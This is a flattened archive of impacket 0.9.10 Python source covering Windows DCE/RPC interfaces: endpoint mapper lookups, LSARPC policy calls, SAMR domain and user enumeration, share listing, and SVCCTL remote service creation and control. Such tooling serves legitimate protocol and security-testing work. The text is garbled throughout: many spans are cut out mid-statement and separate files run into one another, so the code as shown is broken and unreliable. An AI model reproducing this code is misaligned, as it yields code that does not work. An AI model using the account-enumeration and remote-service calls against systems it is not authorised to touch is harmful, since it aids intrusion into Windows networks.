0x80000008 E_UNEXPECTED = 0x8000FFFF # Structures class AT_INFO(Structure): structure = ( ('JobTime', ' self.__max_xmit_size - 32: max_frag = self.__max_xmit_size - 32 # XXX: 32 is a safe margin for auth data if self._max_frag: max_frag = min(max_frag, self._max_frag) if max_frag and len(data['pduData']) > 0: packet = data['pduData'] offset = 0 rawcall = DCERPC_RawCall(data['op_num']) while 1: toSend = packet[offset:offset+max_frag] if not toSend: break flags = 0 if offset == 0: flags |= MSRPC_FIRSTFRAG offset += len(toSend) if offset == len(packet): flags |= MSRPC_LASTFRAG data['flags'] = flags data['pduData'] = toSend self._transport_send(data, forceWriteAndx = 1, forceRecv = flags & MSRPC_LASTFRAG) else: self._transport_send(data) self.__callid += 1 def recv(self): finished = False forceRecv = 0 retAnswer = '' while not finished: # At least give me the MSRPCRespHeader, especially important for TCP/UDP Transports self.response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE) self.response_header = MSRPCRespHeader(self.response_data) # Ok, there might be situation, especially with large packets, that the transport layer didn't send us the full packet's contents # So we gotta check we received it all while ( len(self.response_data) < self.response_header['frag_len'] ): self.response_data += self._transport.recv(forceRecv, count=(self.response_header['frag_len']-len(self.response_data))) off = self.response_header.get_header_size() if self.response_header['type'] == MSRPC_FAULT and self.response_header['frag_len'] >= off+4: status_code = unpack("': from impacket.structure import unpack,pack try: rpc_handle = ''.join(map(chr, rpc_handle)) except: pass uuid = list(unpack('LLHHBB6s', *uuid) lookup = EPMLookupRequestHeader(endianness = self.endianness) lookup.set_handle(rpc_handle); self._dcerpc.send(lookup) data = self._dcerpc.recv() resp = EPMRespLookupRequestHeader(data) return resp # Use these functions to manipulate the portmapper. The previous ones are left for backward compatibility reasons. def doRequest(self, request, noAnswer = 0, checkReturn = 1): self._dcerpc.call(request.opnum, request) if noAnswer: return else: answer = self._dcerpc.recv() if checkReturn and answer[-4:] != '\x00\x00\x00\x00': error_code = unpack(", # , # , # ]} # ActualLength: {88} # NumberOfFloors: {4} # } # _Annotation: {19} # Annotation: {'Impl friendly name\x00'} lookup = EPMLookup() lookup['InquireType'] = inquireType lookup['IfId'] = IfId lookup['UUID'] = ObjectUUID lookup['VersionOption'] = versOpt lookup['EntryHandle'] = resumeHandle entries = [] errorCode = 0 while errorCode != RPC_NO_MORE_ELEMENTS: data = self.doRequest(lookup, checkReturn = 0) resp = EPMLookupResponse(data) data = resp['Entries']['Data'] tmpEntries = [] for i in range(resp['Entries']['ActualCount']): entry = EPMEntry(data) data = data[len(entry):] tmpEntries.append(entry) for entry in tmpEntries: tower = EPMTower(data) data = data[len(tower):] entry['Tower'] = tower entries += tmpEntries if resp['Handle'] == '\x00'*20: break lookup['EntryHandle'] = resp['Handle'] errorCode = resp['ErrorCode'] return entries def PrintStringBinding(floors, serverAddr = '0.0.0.0'): tmp_address = '' tmp_address2 = '' for floor in floors[3:]: if floor['ProtocolData'] == chr(0x07): tmp_address = 'ncacn_ip_tcp:%%s[%d]' % struct.unpack('!H',floor['RelatedData']) elif floor['ProtocolData'] == chr(0x08): tmp_address = 'ncadg_ip_udp:%%s[%d]' % struct.unpack('!H',floor['RelatedData']) elif floor['ProtocolData'] == chr(0x09): tmp_address2 = socket.inet_ntoa(floor['RelatedData']) # If the address were 0.0.0.0 it would have to be replaced by the remote host's IP. if tmp_address2 == '0.0.0.0': tmp_address2 = serverAddr if tmp_address <> '': return tmp_address % tmp_address2 else: return 'IP: %s' % tmp_address2 elif floor['ProtocolData'] == chr(0x0c): tmp_address = 'ncacn_spx:~%%s[%d]' % struct.unpack('!H',floor['RelatedData']) elif floor['ProtocolData'] == chr(0x0d): n = len(floor['RelatedData']) tmp_address2 = ('%02X' * n) % struct.unpack("%dB" % n, floor['RelatedData']) if tmp_address <> '': return tmp_address % tmp_address2 else: return 'SPX: %s' % tmp_address2 elif floor['ProtocolData'] == chr(0x0e): tmp_address = 'ncadg_ipx:~%%s[%d]' % struct.unpack('!H',floor['RelatedData']) elif floor['ProtocolData'] == chr(0x0f): tmp_address = 'ncacn_np:%%s[%s]' % floor['RelatedData'][:len(floor['RelatedData'])-1] elif floor['ProtocolData'] == chr(0x10): return 'ncalrpc:[%s]' % floor['RelatedData'][:len(floor['RelatedData'])-1] elif floor['ProtocolData'] == chr(0x01) or floor['ProtocolData'] == chr(0x11): if tmp_address <> '': return tmp_address % floor['RelatedData'][:len(floor['RelatedData'])-1] else: return 'NetBIOS: %s' % floor['RelatedData'] elif floor['ProtocolData'] == chr(0x1f): tmp_address = 'ncacn_http:%%s[%d]' % struct.unpack('!H',floor['RelatedData']) else: return 'unknown_proto_0x%x:[0]' % ord(floor['ProtocolData'] ) impacket-0.9.10/impacket/dcerpc/lsarpc.py0000600000076500000240000003015212141750575020345 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: lsarpc.py 568 2012-06-23 22:07:40Z bethus@gmail.com $ # # Author: Pablo A. Schachner # Alberto Solino # # Description: # LSARPC interface implementation. # from impacket.structure import Structure from impacket.dcerpc import ndrutils from impacket.dcerpc.samr import SAMR_RPC_SID_IDENTIFIER_AUTHORITY, SAMR_RPC_SID from impacket.uuid import uuidtup_to_bin import random from struct import pack, unpack MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0')) # Constants # POLICY_INFORMATION_CLASS POLICY_AUDIT_LOG_INFORMATION = 1 POLICY_AUDIT_EVENTS_INFORMATION = 2 POLICY_PRIMARY_DOMAIN_INFORMATION = 3 POLICY_PD_ACCOUNT_INFORMATION = 4 POLICY_ACCOUNT_DOMAIN_INFORMATION = 5 POLICY_LSA_SERVER_ROLE_INFORMATION = 6 POLICY_REPLICA_SOURCE_INFORMATION = 7 POLICY_DEFAULT_QUOTA_INFORMATION = 8 POLICY_MODIFICATION_INFORMATION = 9 POLICY_AUDIT_FULL_SET_INFORMATION = 10 POLICY_AUDIT_FULL_QUERY_INFORMATION = 11 POLICY_DNS_DOMAIN_INFORMATION = 12 POLICY_DNS_DOMAIN_INFORMATION_INT = 13 POLICY_LOCAL_ACCOUNT_DOMAIN_INFORMATION = 14 POLICY_LAST_ENTRY = 15 # Structs class LSARPCOpenPolicy2(Structure): opnum = 44 alignment = 4 structure = ( ('ServerName',':',ndrutils.NDRUniqueStringW), ('ObjectAttributes','24s'), ('AccessMask',' 0: floors = self._tower.get_floors() print "IfId: %s [%s]" % (floors[0].get_uuid_string(), uuid_to_exe(floors[0].get_uuid())) if self._annotation: print "Annotation: %s" % self._annotation print "UUID: %s" % parse_uuid(self._objectid) print "Binding: %s" % self.get_string_binding() print '' def get_string_binding(self): if self._tower <> 0: tmp_address = '' tmp_address2 = '' floors = self._tower.get_floors() num_floors = self._tower.get_number_of_floors() for i in range(3,num_floors): if floors[i].get_protocol() == 0x07: tmp_address = 'ncacn_ip_tcp:%%s[%d]' % unpack('!H',floors[i].get_rhs()) elif floors[i].get_protocol() == 0x08: tmp_address = 'ncadg_ip_udp:%%s[%d]' % unpack('!H',floors[i].get_rhs()) elif floors[i].get_protocol() == 0x09: # If the address were 0.0.0.0 it would have to be replaced by the remote host's IP. tmp_address2 = socket.inet_ntoa(floors[i].get_rhs()) if tmp_address <> '': return tmp_address % tmp_address2 else: return 'IP: %s' % tmp_address2 elif floors[i].get_protocol() == 0x0c: tmp_address = 'ncacn_spx:~%%s[%d]' % unpack('!H',floors[i].get_rhs()) elif floors[i].get_protocol() == 0x0d: n = floors[i].get_rhs_len() tmp_address2 = ('%02X' * n) % unpack("%dB" % n, floors[i].get_rhs()) if tmp_address <> '': return tmp_address % tmp_address2 else: return 'SPX: %s' % tmp_address2 elif floors[i].get_protocol() == 0x0e: tmp_address = 'ncadg_ipx:~%%s[%d]' % unpack('!H',floors[i].get_rhs()) elif floors[i].get_protocol() == 0x0f: tmp_address = 'ncacn_np:%%s[%s]' % floors[i].get_rhs()[:floors[i].get_rhs_len()-1] elif floors[i].get_protocol() == 0x10: return 'ncalrpc:[%s]' % floors[i].get_rhs()[:floors[i].get_rhs_len()-1] elif floors[i].get_protocol() == 0x01 or floors[i].get_protocol() == 0x11: if tmp_address <> '': return tmp_address % floors[i].get_rhs()[:floors[i].get_rhs_len()-1] else: return 'NetBIOS: %s' % floors[i].get_rhs() elif floors[i].get_protocol() == 0x1f: tmp_address = 'ncacn_http:%%s[%d]' % unpack('!H',floors[i].get_rhs()) else: if floors[i].get_protocol_string() == 'unknown': return 'unknown_proto_0x%x:[0]' % floors[i].get_protocol() elif floors[i].get_protocol_string() <> 'UUID': return 'protocol: %s, value: %s' % (floors[i].get_protocol_string(), floors[i].get_rhs()) class NDREntries: def __init__(self,data=''): self._max_count = 0 self._offset = 0 self._actual_count = 0 self._entries_len = 0 self._entries = [] if data: self._max_count, self._offset, self._actual_count = unpack(' 0 return SAMRConnectHeader.__SIZE + var_size class SAMRRespConnectHeader(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespConnectHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tostring()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return SAMRRespConnectHeader.__SIZE class SAMREnumDomainsHeader(ImpactPacket.Header): OP_NUM = 0x6 __SIZE = 28 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMREnumDomainsHeader.__SIZE) self.set_pref_max_size(8192) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_resume_handle(self): return self.get_long(20, '<') def set_resume_handle(self, handle): self.set_long(20, handle, '<') def get_pref_max_size(self): return self.get_long(24, '<') def set_pref_max_size(self, size): self.set_long(24, size, '<') def get_header_size(self): return SAMREnumDomainsHeader.__SIZE class SAMRRespEnumDomainHeader(ImpactPacket.Header): __SIZE = 12 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespEnumDomainHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_resume_handle(self): return self.get_long(0, '<') def set_resume_handle(self, handle): self.set_long(0, handle, '<') def get_domains(self): return dcerpc.MSRPCNameArray(self.get_bytes()[4:-8].tostring()) def set_domains(self, domains): assert isinstance(domains, dcerpc.MSRPCNameArray) self.get_bytes()[4:-8] = array.array('B', domains.rawData()) def get_entries_num(self): return self.get_long(-8, '<') def set_entries_num(self, num): self.set_long(-8, num, '<') def get_return_code(self): return self.get_long(-4, '<') def set_return_code(self, code): self.set_long(-4, code, '<') def get_header_size(self): var_size = len(self.get_bytes()) - SAMRRespEnumDomainHeader.__SIZE assert var_size > 0 return SAMRRespEnumDomainHeader.__SIZE + var_size class SAMRLookupDomainHeader(ImpactPacket.Header): OP_NUM = 0x5 __SIZE = 20 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRLookupDomainHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_domain(self): return dcerpc.MSRPCArray(self.get_bytes().tolist()[20:]) def set_domain(self, domain): assert isinstance(domain, dcerpc.MSRPCArray) self.get_bytes()[20:] = array.array('B', domain.rawData()) def get_header_size(self): var_size = len(self.get_bytes()) - SAMRLookupDomainHeader.__SIZE assert var_size > 0 return SAMRLookupDomainHeader.__SIZE + var_size class SAMRRespLookupDomainHeader(ImpactPacket.Header): __SIZE = 36 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespLookupDomainHeader.__SIZE) if aBuffer: self.load_header(aBuffer) ## def get_sid_count(self): ## return self.get_long(4, '<') ## def set_sid_count(self, count): ## self.set_long(4, count, '<') ## def get_domain_sid(self): ## return self.get_bytes().tolist()[8:8+24] ## def set_domain_sid(self, sid): ## assert 24 == len(sid) ## self.get_bytes()[8:8+24] = array.array('B', sid) def get_domain_sid(self): return self.get_bytes().tolist()[4:4+28] def set_domain_sid(self, sid): assert 28 == len(sid) self.get_bytes()[4:4+28] = array.array('B', sid) def get_return_code(self): return self.get_long(32, '<') def set_return_code(self, code): self.set_long(32, code, '<') def get_header_size(self): return SAMRRespLookupDomainHeader.__SIZE class SAMROpenDomainHeader(ImpactPacket.Header): OP_NUM = 0x7 __SIZE = 52 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMROpenDomainHeader.__SIZE) self.set_access_mask(0x304) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_access_mask(self): return self.get_long(20, '<') def set_access_mask(self, mask): self.set_long(20, mask, '<') ## def get_sid_count(self): ## return self.get_long(24, '<') ## def set_sid_count(self, count): ## self.set_long(24, count, '<') ## def get_domain_sid(self): ## return self.get_bytes().tolist()[28:28+24] ## def set_domain_sid(self, sid): ## assert 24 == len(sid) ## self.get_bytes()[28:28+24] = array.array('B', sid) def get_domain_sid(self): return self.get_bytes().tolist()[24:24+28] def set_domain_sid(self, sid): assert 28 == len(sid) self.get_bytes()[24:24+28] = array.array('B', sid) def get_header_size(self): return SAMROpenDomainHeader.__SIZE class SAMRRespOpenDomainHeader(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespOpenDomainHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return SAMRRespOpenDomainHeader.__SIZE class SAMREnumDomainUsersHeader(ImpactPacket.Header): OP_NUM = OP_NUM_ENUM_USERS_IN_DOMAIN __SIZE = 32 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMREnumDomainUsersHeader.__SIZE) self.set_pref_max_size(3275) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_resume_handle(self): return self.get_long(20, '<') def set_resume_handle(self, handle): self.set_long(20, handle, '<') def get_account_control(self): return self.get_long(24, '<') def set_account_control(self, mask): self.set_long(24, mask, '<') def get_pref_max_size(self): return self.get_long(28, '<') def set_pref_max_size(self, size): self.set_long(28, size, '<') def get_header_size(self): return SAMREnumDomainUsersHeader.__SIZE class SAMRRespEnumDomainUsersHeader(ImpactPacket.Header): __SIZE = 16 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespEnumDomainUsersHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_resume_handle(self): return self.get_long(0, '<') def set_resume_handle(self, handle): self.set_long(0, handle, '<') def get_users(self): return dcerpc.MSRPCNameArray(self.get_bytes()[4:-8].tostring()) def set_users(self, users): assert isinstance(users, dcerpc.MSRPCNameArray) self.get_bytes()[4:-8] = array.array('B', users.rawData()) def get_entries_num(self): return self.get_long(-8, '<') def set_entries_num(self, num): self.set_long(-8, num, '<') def get_return_code(self): return self.get_long(-4, '<') def set_return_code(self, code): self.set_long(-4, code, '<') def get_header_size(self): var_size = len(self.get_bytes()) - SAMRRespEnumDomainUsersHeader.__SIZE assert var_size > 0 return SAMRRespEnumDomainUsersHeader.__SIZE + var_size class SAMROpenUserHeader(ImpactPacket.Header): OP_NUM = 0x22 __SIZE = 28 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMROpenUserHeader.__SIZE) self.set_access_mask(0x2011B) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_access_mask(self): return self.get_long(20, '<') def set_access_mask(self, mask): self.set_long(20, mask, '<') def get_rid(self): return self.get_long(24, '<') def set_rid(self, id): self.set_long(24, id, '<') def get_header_size(self): return SAMROpenUserHeader.__SIZE class SAMRRespOpenUserHeader(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespOpenUserHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return SAMRRespOpenUserHeader.__SIZE class SAMRQueryUserInfoHeader(ImpactPacket.Header): OP_NUM = 0x24 __SIZE = 22 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRQueryUserInfoHeader.__SIZE) self.set_level(21) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_level(self): return self.get_word(20, '<') def set_level(self, level): self.set_word(20, level, '<') def get_header_size(self): return SAMRQueryUserInfoHeader.__SIZE class SAMRRespQueryUserInfoHeader(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespQueryUserInfoHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_user_info(self): return MSRPCUserInfo(self.get_bytes()[:-4].tostring()) def set_user_info(self, info): assert isinstance(info, MSRPCUserInfo) self.get_bytes()[:-4] = array.array('B', info.rawData()) def get_return_code(self): return self.get_long(-4, '<') def set_return_code(self, code): self.set_long(-4, code, '<') def get_header_size(self): var_size = len(self.get_bytes()) - SAMRRespQueryUserInfoHeader.__SIZE assert var_size > 0 return SAMRRespQueryUserInfoHeader.__SIZE + var_size class SAMRCloseRequestHeader(ImpactPacket.Header): OP_NUM = 0x1 __SIZE = 20 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRCloseRequestHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_header_size(self): return SAMRCloseRequestHeader.__SIZE class SAMRRespCloseRequestHeader(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SAMRRespCloseRequestHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return SAMRRespCloseRequestHeader.__SIZE class DCERPCSamr: def __init__(self, dcerpc): self._dcerpc = dcerpc def doRequest(self, request, noAnswer = 0, checkReturn = 1): self._dcerpc.call(request.opnum, request) if noAnswer: return else: answer = self._dcerpc.recv() return answer def connect(self): samrcon = SAMRConnectHeader() samrcon.set_server('*SMBSERVER') self._dcerpc.send(samrcon) data = self._dcerpc.recv() retVal = SAMRRespConnectHeader(data) return retVal def enumdomains(self,context_handle): enumdom = SAMREnumDomainsHeader() enumdom.set_context_handle(context_handle) self._dcerpc.send(enumdom) data = self._dcerpc.recv() retVal = SAMRRespEnumDomainHeader(data) return retVal def lookupdomain(self,context_handle,domain): lookupdom = SAMRLookupDomainHeader() lookupdom.set_context_handle(context_handle) lookupdom.set_domain(domain) self._dcerpc.send(lookupdom) data = self._dcerpc.recv() retVal = SAMRRespLookupDomainHeader(data) return retVal def opendomain(self,context_handle,domain_sid): opendom = SAMROpenDomainHeader() opendom.set_context_handle(context_handle) opendom.set_domain_sid(domain_sid) self._dcerpc.send(opendom) data = self._dcerpc.recv() retVal = SAMRRespOpenDomainHeader(data) return retVal def enumusers(self,context_handle, resume_handle = 0): enumusers = SAMREnumDomainUsersHeader() enumusers.set_context_handle(context_handle) enumusers.set_resume_handle(resume_handle) self._dcerpc.send(enumusers) data = self._dcerpc.recv() retVal = SAMRRespEnumDomainUsersHeader(data) return retVal def openuser(self,context_handle, rid): openuser = SAMROpenUserHeader() openuser.set_context_handle(context_handle) openuser.set_rid(rid) self._dcerpc.send(openuser) data = self._dcerpc.recv() retVal = SAMRRespOpenUserHeader(data) return retVal def queryuserinfo(self,context_handle): userinfo = SAMRQueryUserInfoHeader() userinfo.set_context_handle(context_handle) self._dcerpc.send(userinfo) data = self._dcerpc.recv() retVal = SAMRRespQueryUserInfoHeader(data) return retVal def closerequest(self,context_handle): closereq = SAMRCloseRequestHeader() closereq.set_context_handle(context_handle) self._dcerpc.send(closereq) data = self._dcerpc.recv() retVal = SAMRRespCloseRequestHeader(data) return retVal def EnumerateAliasesInDomain(self, context_handle): enumAliases = SAMREnumerateAliasesInDomain() enumAliases['ContextHandle'] = context_handle ans = self.doRequest(enumAliases, checkReturn = 0) packet = SAMREnumerateAliasesInDomainResponse(ans) enum = dcerpc.MSRPCNameArray(packet['pEnumerationBuffer']) return enum.elements() def OpenAlias(self, context_handle, alias_id): open_alias = SAMROpenAlias() open_alias['ContextHandle'] = context_handle open_alias['AliasId'] = alias_id open_alias['AccessMask'] = 0x2000C ans = self.doRequest(open_alias) packet = SAMROpenAliasResponse(ans) return packet def GetMembersInAlias(self, context_handle): alias_members = SAMRGetMembersInAlias() alias_members['ContextHandle'] = context_handle ans = self.doRequest(alias_members) packet = SAMRGetMembersInAliasResponse(ans) # Now parse the Aliases if packet['Count'] > 0: # Skipping the pointer data data = packet['pEnumerationBuffer'][8:] # Skipping the referent ID for each entry data = data[4*packet['Count']:] entries = [] for i in range(packet['Count']): # Skip the count ID data = data[4:] entry = SAMR_RPC_SID(data) entries.append(entry) data = data[len(entry):] packet['EnumerationBuffer'] = entries return packet impacket-0.9.10/impacket/dcerpc/srvsvc.py0000600000076500000240000003622212141750575020413 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: srvsvc.py 531 2012-05-01 23:20:26Z bethus@gmail.com $ # # Author: Alberto Solino # # Description: # SRVSVC interface implementation. # # TODO: NetServerEnum2 import array from struct import * import exceptions from impacket import ImpactPacket from impacket.structure import Structure from impacket import dcerpc from impacket.dcerpc import ndrutils from impacket.uuid import uuidtup_to_bin MSRPC_UUID_SRVSVC = uuidtup_to_bin(('4B324FC8-1670-01D3-1278-5A47BF6EE188', '3.0')) # We should move this to ndrutils.py once we port it to structure class NDRString(Structure): alignment = 4 structure = ( ('sName','w'), ) class SRVSVCShareEnumStruct(Structure): alignment = 4 structure = ( ('Level',' self._max_xmit_size - 32: max_frag = self._max_xmit_size - 32 # XXX: 32 is a safe margin for auth data if self._max_frag: max_frag = min(max_frag, self._max_frag) if max_frag and len(data['pduData']) > 0: packet = data['pduData'] offset = 0 while 1: toSend = packet[offset:offset+max_frag] if not toSend: break flags = 0 if offset == 0: flags |= dcerpc.MSRPC_FIRSTFRAG offset += len(toSend) if offset == len(packet): flags |= dcerpc.MSRPC_LASTFRAG data['flags'] = flags data['pduData'] = toSend self._clientSock.send(data.get_packet()) else: self._clientSock.send(data.get_packet()) self._callid += 1 def bind(self,packet, bind): # Standard NDR Representation NDRSyntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0') resp = dcerpc.MSRPCBindAck() resp['type'] = dcerpc.MSRPC_BINDACK resp['flags'] = packet['flags'] resp['frag_len'] = 0 resp['auth_len'] = 0 resp['auth_data'] = '' resp['call_id'] = packet['call_id'] resp['max_tfrag'] = bind['max_tfrag'] resp['max_rfrag'] = bind['max_rfrag'] resp['assoc_group'] = 0x1234 resp['SecondaryAddrLen'] = 4 resp['SecondaryAddr'] = '135' resp['Pad'] ='A'*((4-((resp["SecondaryAddrLen"]+dcerpc.MSRPCBindAck._SIZE) % 4))%4) resp['ctx_num'] = 0 data = bind['ctx_items'] ctx_items = '' for i in range(bind['ctx_num']): result = dcerpc.MSRPC_CONT_RESULT_USER_REJECT item = dcerpc.CtxItem(data) data = data[len(item):] # First we check the Transfer Syntax is NDR32, what we support #print "Trying to bind to: %s %s / %s %s" % (bin_to_uuidtup(item['AbstractSyntax']) + bin_to_uuidtup(item['TransferSyntax'])), if item['TransferSyntax'] == uuidtup_to_bin(NDRSyntax): # Now Check if the interface is what we listen reason = 1 # Default, Abstract Syntax not supported for i in self._listenUUIDS: if item['AbstractSyntax'] == i: # Match, we accept the bind request reason = 0 self._boundUUID = i else: # Fail the bind request for this context reason = 2 # Transfer Syntax not supported if reason == 0: result = dcerpc.MSRPC_CONT_RESULT_ACCEPT #print "... OK!" #else: # print "... ERROR!" resp['ctx_num'] += 1 itemResult = dcerpc.CtxItemResult() itemResult['Result'] = result itemResult['Reason'] = reason itemResult['TransferSyntax'] = uuidtup_to_bin(NDRSyntax) ctx_items += str(itemResult) resp['ctx_items'] = ctx_items resp['frag_len'] = len(str(resp)) self._clientSock.send(str(resp)) return None def processRequest(self,data): packet = dcerpc.MSRPCHeader(data) if packet['type'] == dcerpc.MSRPC_BIND: bind = dcerpc.MSRPCBind(packet['pduData']) packet = self.bind(packet, bind) elif packet['type'] == dcerpc.MSRPC_REQUEST: request = dcerpc.MSRPCRequestHeader(data) response = dcerpc.MSRPCRespHeader(data) response['type'] = dcerpc.MSRPC_RESPONSE # Serve the opnum requested, if not, fails if self._callbacks[self._boundUUID].has_key(request['op_num']): # Call the function returnData = self._callbacks[self._boundUUID][request['op_num']](request['pduData']) response['pduData'] = returnData else: response['type'] = dcerpc.MSRPC_FAULT response['pduData'] = struct.pack(' 0 return SVCCTLCreateServiceHeader.__SIZE + var_size class SVCCTLRespCreateServiceHeader(ImpactPacket.Header): __SIZE = 28 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLRespCreateServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[4:24] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[4:24] = array.array('B', handle) def get_return_code(self): return self.get_long(24, '<') def set_return_code(self, code): self.set_long(24, code, '<') def get_header_size(self): return SVCCTLRespCreateServiceHeader.__SIZE class SVCCTLDeleteServiceHeader(ImpactPacket.Header): OP_NUM = 0x2 __SIZE = 20 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLDeleteServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_header_size(self): return SVCCTLDeleteServiceHeader.__SIZE class SVCCTLRespDeleteServiceHeader(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLRespDeleteServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(0, '<') def set_return_code(self, code): self.set_long(0, code, '<') def get_header_size(self): return SVCCTLRespDeleteServiceHeader.__SIZE class SVCCTLStopServiceHeader(ImpactPacket.Header): OP_NUM = 0x1 __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLStopServiceHeader.__SIZE) # Write some unknown fluff. self.get_bytes()[20:] = array.array('B', '\x01\x00\x00\x00') if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_header_size(self): return SVCCTLStopServiceHeader.__SIZE class SVCCTLRespStopServiceHeader(ImpactPacket.Header): __SIZE = 32 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLRespStopServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(28, '<') def set_return_code(self, code): self.set_long(28, code, '<') def get_header_size(self): return SVCCTLRespStopServiceHeader.__SIZE class SVCCTLStartServiceHeader(ImpactPacket.Header): OP_NUM = 0x1F __SIZE = 32 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLStartServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_arguments(self): raise Exception, "method not implemented" def set_arguments(self, arguments): args_data = apply(pack, ['<' + 'L'*len(arguments)] + map(id, arguments) ) args_data += reduce(lambda a, b: a+b, map(lambda element: pack(' 0 return SVCCTLStartServiceHeader.__SIZE + var_size class SVCCTLRespStartServiceHeader(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, SVCCTLRespStartServiceHeader.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(0, '<') def set_return_code(self, code): self.set_long(0, code, '<') def get_header_size(self): return SVCCTLRespStartServiceHeader.__SIZE class DCERPCSvcCtl: def __init__(self, dcerpc): self._dcerpc = dcerpc def open_manager(self): hostname = 'IMPACT' opensc = SVCCTLOpenSCManagerHeader() opensc.set_machine_name(hostname) self._dcerpc.send(opensc) data = self._dcerpc.recv() retVal = SVCCTLRespOpenSCManagerHeader(data) return retVal def create_service(self, context_handle, service_name, service_path): creates = 